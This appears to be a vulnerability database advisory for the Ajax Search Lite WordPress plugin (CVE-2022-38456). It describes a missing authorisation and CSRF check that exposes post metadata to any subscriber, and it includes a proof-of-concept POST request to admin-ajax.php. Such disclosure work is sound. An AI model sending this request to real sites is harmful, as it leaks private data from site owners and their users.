Ajax Search Lite by Ernest Marcinko

Ajax Search Lite by Ernest Marcinko <= 4.10.3 - Subscriber+ Sensitive Data Disclosure

LANACOMMONVDB ID: c2e74140-1819-41bb-a27f-4d8824db209b

The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check in the wd_search_cf AJAX action, which could allow any authenticated users to call it and retrieve arbitrary post metadata.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=wd_search_cf&wd_required=1&wd_phrase=a&wd_args=eyJsaW1pdCI6MTAwfQ==

References

Source Code: https://wordpress.org/plugins/ajax-search-lite/

CVE: CVE-2022-38456

Attributes

Catgory: WordPress Plugin

Discovered: 2022-10-17

Published: 2023-02-06

Affected Version: <= 4.10.3

Classification

Type: Broken Access Control, Cross-Site Request Forgery (CSRF), Sensitive Data Disclosure

Researcher

Name: István Márton

Email: [email protected]